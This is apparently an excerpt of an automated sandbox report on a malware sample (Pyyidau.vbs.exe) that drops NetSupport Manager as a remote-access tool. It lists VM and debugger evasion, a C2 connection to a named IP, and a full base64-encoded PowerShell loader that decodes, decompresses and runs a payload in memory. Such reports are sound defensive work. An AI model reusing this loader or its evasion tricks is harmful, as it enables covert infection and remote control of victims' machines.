                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.00000000051F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                                Source: client32.exe, 00000020.00000002.115185392651.000000006C888000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesHyper-VvirtualVMWarevirtBluetoothtcctlex.cppntohlserialVariantUtil.cppvariantIsScalar(_vtData)_Lower==0_nDim==1variant.vt & VT_ARRAYvariant.vt==VT_BSTR || variant.vt==(VT_BSTR | VT_BYREF)variant.vt==VT_EMPTY(serial.m_vtType & VT_ARRAY)!=0serial.m_vtType==VT_BSTRserial.m_vtType==VT_EMPTYserial.m_nBytes==SizeOf(variant.vt)serial.m_vtType==variant.vt_nBy==SizeOf(serial)falsettrue1WinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllError. WinHttpWebSocketReceive(%d) ret %d
                                Source: client32.exe, 00000020.00000003.115045937501.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069209517.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115102675538.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114561669687.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114265892203.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115102203122.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115115215822.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069439316.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115114283610.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115080634297.0000000000A56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: client32.exe, 00000020.00000003.115045937501.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069209517.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115102675538.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114561669687.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114265892203.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115102203122.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115115215822.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069439316.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115114283610.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115080634297.0000000000A56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWF
                                Source: client32.exe, 00000020.00000002.115186233551.000000006C977000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: VMWare
                                Source: client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: vmwareVIRT%d adapters in chain, %d adapters by size
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.00000000051F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                                Source: wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 000000000002004C4F4F50%02X%02X%02X%02X%02X%02XVirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTH..\ctl32\macaddr.cpp%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll%02X%02X%02X%02X%02X%02Xmap/set<T> too longinvalid map/set<T> iterator,%02X
                                Source: client32.exe, 00000020.00000002.115185392651.000000006C888000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: hbuf->datahttputil.chbuf->data || newlen == 0pNewhbuf->buflen >= hbuf->datalen%d000000000002004C4F4F50%02X%02X%02X%02X%02X%02XVirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll%02X%02X%02X%02X%02X%02X%02X01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!
                                Source: pcicfgui_client.exe, 00000022.00000002.114281913286.00000000011AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesHyper-VvirtualVMWarevirtBluetoothpfn..\ctl32\tcctlex.cppRtlIpv6AddressToStringWntdll.dllntohl%s%dNSNNSPChassisTypesSystemEnclosureWin32_SystemEnclosure
                                Source: C:\Windows\Installer\MSIF373.tmpAPI call chain: ExitProcess graph end nodegraph_25-60136
                                Source: C:\Windows\Installer\MSIF985.tmpAPI call chain: ExitProcess graph end node
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Windows\Installer\MSI1387.tmpAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information queried: ProcessInformationJump to behavior

                                Anti Debugging

                                barindex
                                Hides threads from debuggers
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeThread information set: HideFromDebugger
                                Tries to detect sandboxes and other dynamic analysis tools (window names)
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeOpen window title or class name: procmon_window_class
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeProcess queried: DebugPort
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeProcess queried: DebugPort
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005E82B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_005E82B3
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005B0130 GetLastError,GetTickCount,GetMessageW,TranslateMessage,DispatchMessageW,GetTickCount,GetMessageW,TranslateMessage,DispatchMessageW,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,wsprintfW,wsprintfW,wsprintfW,GetCurrentProcess,GetProcessTimes,GetSystemTimeAsFileTime,wsprintfW,GetCurrentThreadId,wsprintfW,GetCurrentProcess,GetGuiResources,wsprintfW,GetCurrentThreadId,wsprintfW,OutputDebugStringW,wsprintfW,wsprintfW,GetModuleFileNameW,wsprintfW,GetTempPathW,GetLocalTime,GetVersionExW,wsprintfW,wsprintfW,wsprintfW,SetTimer,MessageBoxW,KillTimer,PeekMessageW,MessageBoxW,25_2_005B0130
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D5490 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,FreeLibrary,25_2_005D5490
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_0060C0DC GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,SetEndOfFile,GetLastError,25_2_0060C0DC
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess token adjusted: Debug
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005FA1DA SetUnhandledExceptionFilter,25_2_005FA1DA
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005E82B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_005E82B3
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005ED4EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_005ED4EC
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005DDDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,LoadStringW,wsprintfW,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,25_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0093A1DA SetUnhandledExceptionFilter,27_2_0093A1DA
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009282B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_009282B3
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0092D4EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_0092D4EC
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0091DDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,LoadStringW,wsprintfW,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,27_2_0091DDD0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_007934C3 SetUnhandledExceptionFilter,28_2_007934C3
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_0078361B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_0078361B
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_00787798 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00787798
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FEDDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,LoadStringW,wsprintfW,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,GetCurrentDirectoryW,PostMessageW,KiUserCallbackDispatcher,Sleep,29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_0100A1DA SetUnhandledExceptionFilter,29_2_0100A1DA
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FF82B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_00FF82B3
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FFD4EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00FFD4EC
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 176.126.113.166 443Jump to behavior
                                Contains functionality to automate explorer (e.g. start an application)
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005E03E0 GetClassNameW,GetModuleHandleW,GetProcAddress,SHGetFolderPathW,LoadLibraryW,LoadLibraryW,GetModuleFileNameW,LoadLibraryW,GetProcAddress,GetWindowThreadProcessId,OpenProcess,CreateEventW,wsprintfW,CreateEventW,GetDesktopWindow,SendMessageW,Sleep,WaitForSingleObject,CreateEventW,IsWindow,GetClassNameW,IsWindowVisible,SetEvent,IsWindow,WaitForMultipleObjects,Sleep,WaitForSingleObject,IsWindow,WaitForSingleObject,FindWindowExW,GetWindowLongW,ShowWindow,ShowWindow,ShowWindow,WaitForSingleObject,WaitForSingleObject,ResetEvent,WaitForSingleObject,GetProcAddress,CloseHandle,GetDesktopWindow,GetWindowThreadProcessId,OpenProcess,OpenProcess,OpenProcess,GetPriorityClass,SetPriorityClass,GetDesktopWindow,SendMessageW,Sleep,SetPriorityClass,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,25_2_005E03E0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009203E0 GetClassNameW,GetModuleHandleW,GetProcAddress,SHGetFolderPathW,LoadLibraryW,LoadLibraryW,GetModuleFileNameW,LoadLibraryW,GetProcAddress,GetWindowThreadProcessId,OpenProcess,CreateEventW,wsprintfW,CreateEventW,GetDesktopWindow,SendMessageW,Sleep,WaitForSingleObject,CreateEventW,IsWindow,GetClassNameW,IsWindowVisible,SetEvent,IsWindow,WaitForMultipleObjects,Sleep,WaitForSingleObject,IsWindow,WaitForSingleObject,FindWindowExW,GetWindowLongW,ShowWindow,ShowWindow,ShowWindow,WaitForSingleObject,WaitForSingleObject,ResetEvent,WaitForSingleObject,GetProcAddress,CloseHandle,GetDesktopWindow,GetWindowThreadProcessId,OpenProcess,OpenProcess,OpenProcess,GetPriorityClass,SetPriorityClass,GetDesktopWindow,SendMessageW,Sleep,SetPriorityClass,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,27_2_009203E0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FF03E0 GetClassNameW,GetModuleHandleW,GetProcAddress,SHGetFolderPathW,LoadLibraryW,LoadLibraryW,GetModuleFileNameW,LoadLibraryW,GetProcAddress,GetWindowThreadProcessId,OpenProcess,CreateEventW,wsprintfW,CreateEventW,GetDesktopWindow,SendMessageW,Sleep,WaitForSingleObject,CreateEventW,IsWindow,GetClassNameW,IsWindowVisible,SetEvent,IsWindow,WaitForMultipleObjects,Sleep,WaitForSingleObject,IsWindow,WaitForSingleObject,FindWindowExW,GetWindowLongW,ShowWindow,ShowWindow,ShowWindow,WaitForSingleObject,WaitForSingleObject,ResetEvent,WaitForSingleObject,GetProcAddress,CloseHandle,GetDesktopWindow,GetWindowThreadProcessId,OpenProcess,OpenProcess,OpenProcess,GetPriorityClass,SetPriorityClass,GetDesktopWindow,SendMessageW,Sleep,SetPriorityClass,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,29_2_00FF03E0
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Pyyidau.vbs.exe "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIF985.tmp "C:\Windows\Installer\MSIF985.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EUJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe"Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI1387.tmp "C:\Windows\Installer\MSI1387.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I * Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI23E6.tmp "C:\Windows\Installer\MSI23E6.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EIJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Pyyidau.vbs.exe "c:\users\user\desktop\pyyidau.vbs.exe" -enc jabbaheadwb3ahmaywagad0aiabbafmaeqbzahqazqbtac4arabpageazwbuag8acwb0agkaywbzac4auabyag8aywblahmacwbdadoaogbhaguadabdahuacgbyaguabgb0afaacgbvagmazqbzahmakaapac4atqbhagkabgbnag8azab1agwazqauaeyaaqbsaguatgbhag0azqauafiazqbwagwayqbjaguakaanac4azqb4aguajwasaccajwapadsajabhahkaaqblahaazwbrahcadgbyacaapqagagcazqb0ac0aywbvag4adablag4adaagacqaqqbxahcadwbzagmaiab8acaauwblagwazqbjahqalqbpagiaagblagmadaagac0atabhahmadaagadeaowagacqawabzagwabqb3ag0abwbxagcaawb6acaapqagafsauwb5ahmadablag0algbdag8abgb2aguacgb0af0aoga6aeyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaakaecaeqbpaguacabnagsadwb2ahialgbsaguacabsageaywblacgajwbsaeuatqagaccalaagaccajwapac4augblahaababhagmazqaoaccaqaanacwaiaanaeeajwapackaowakaekadwbxagiadwbjacaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtacgaiaasacaajabyahmababtahcabqbvaheazwbrahoaiaapadsajabfag0aygbtaguacwbqahmabaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqaugb3ahaadqb4ahcayqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbdag8abqbwahiazqbzahmaaqbvag4algbhahoaaqbwafmadabyaguayqbtacaajabjahcacqbiahcaywasacaakabbaekatwauaemabwbtahaacgblahmacwbpag8abgauaemabwbtahaacgblahmacwbpag8abgbnag8azablaf0aoga6aeqazqbjag8abqbwahiazqbzahmakqa7acqaugb3ahaadqb4ahcayqauaemabwbwahkavabvacgaiaakaeuabqbiag0azqbzagoacwbsacaakqa7acqaugb3ahaadqb4ahcayqauaemababvahmazqaoackaowakaekadwbxagiadwbjac4aqwbsag8acwblacgakqa7afsaygb5ahqazqbbaf0axqagacqawabzagwabqb3ag0abwbxagcaawb6acaapqagacqarqbtagiabqblahmaagbzagwalgbuag8aqqbyahiayqb5acgakqa7afsaqqbyahiayqb5af0aoga6afiazqb2aguacgbzaguakaakafgacwbsag0adwbtag8acqbnagsaegapadsaiaakae4azgbragyazwb0ahqacgagad0aiabbafmaeqbzahqazqbtac4avaboahiazqbhagqaaqbuagcalgbuaggacgblageazabdadoaogbhaguadabeag8abqbhagkabgaoackalgbmag8ayqbkacgajabyahmababtahcabqbvaheazwbrahoakqa7acaajabbahyazgbuahgadqbrag4acgbtag0aiaa9acaajaboagyaawbmagcadab0ahialgbfag4adabyahkauabvagkabgb0adsaiabbafmaeqbzahqazqbtac4arablagwazqbnageadablaf0aoga6aemacgblageadablaeqazqbsaguazwbhahqazqaoafsaqqbjahqaaqbvag4axqasacaajabbahyazgbuahgadqbrag4acgbtag0algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakaeeadgbmag4aeab1agsabgbyag0abqauae4ayqbtaguakqauaeqaeqbuageabqbpagmasqbuahyabwbraguakaapacaafaagae8adqb0ac0atgb1agwabaa=
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI1387.tmp "c:\windows\installer\msi1387.tmp" /g"c:\program files (x86)\netsupport\netsupport manager\" /ev"netsupport school" /ef".\log files" /ef".\bookmarks" /ef".\tests" /ef".\store" /ef".\inv" /ef".\resources" /ef".\help" /ef".\image" /ef".\sound" /ef".\video" /ea /ex /ec /q /v /q /i *
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Pyyidau.vbs.exe "c:\users\user\desktop\pyyidau.vbs.exe" -enc jabbaheadwb3ahmaywagad0aiabbafmaeqbzahqazqbtac4arabpageazwbuag8acwb0agkaywbzac4auabyag8aywblahmacwbdadoaogbhaguadabdahuacgbyaguabgb0afaacgbvagmazqbzahmakaapac4atqbhagkabgbnag8azab1agwazqauaeyaaqbsaguatgbhag0azqauafiazqbwagwayqbjaguakaanac4azqb4aguajwasaccajwapadsajabhahkaaqblahaazwbrahcadgbyacaapqagagcazqb0ac0aywbvag4adablag4adaagacqaqqbxahcadwbzagmaiab8acaauwblagwazqbjahqalqbpagiaagblagmadaagac0atabhahmadaagadeaowagacqawabzagwabqb3ag0abwbxagcaawb6acaapqagafsauwb5ahmadablag0algbdag8abgb2aguacgb0af0aoga6aeyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaakaecaeqbpaguacabnagsadwb2ahialgbsaguacabsageaywblacgajwbsaeuatqagaccalaagaccajwapac4augblahaababhagmazqaoaccaqaanacwaiaanaeeajwapackaowakaekadwbxagiadwbjacaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtacgaiaasacaajabyahmababtahcabqbvaheazwbrahoaiaapadsajabfag0aygbtaguacwbqahmabaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqaugb3ahaadqb4ahcayqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbdag8abqbwahiazqbzahmaaqbvag4algbhahoaaqbwafmadabyaguayqbtacaajabjahcacqbiahcaywasacaakabbaekatwauaemabwbtahaacgblahmacwbpag8abgauaemabwbtahaacgblahmacwbpag8abgbnag8azablaf0aoga6aeqazqbjag8abqbwahiazqbzahmakqa7acqaugb3ahaadqb4ahcayqauaemabwbwahkavabvacgaiaakaeuabqbiag0azqbzagoacwbsacaakqa7acqaugb3ahaadqb4ahcayqauaemababvahmazqaoackaowakaekadwbxagiadwbjac4aqwbsag8acwblacgakqa7afsaygb5ahqazqbbaf0axqagacqawabzagwabqb3ag0abwbxagcaawb6acaapqagacqarqbtagiabqblahmaagbzagwalgbuag8aqqbyahiayqb5acgakqa7afsaqqbyahiayqb5af0aoga6afiazqb2aguacgbzaguakaakafgacwbsag0adwbtag8acqbnagsaegapadsaiaakae4azgbragyazwb0ahqacgagad0aiabbafmaeqbzahqazqbtac4avaboahiazqbhagqaaqbuagcalgbuag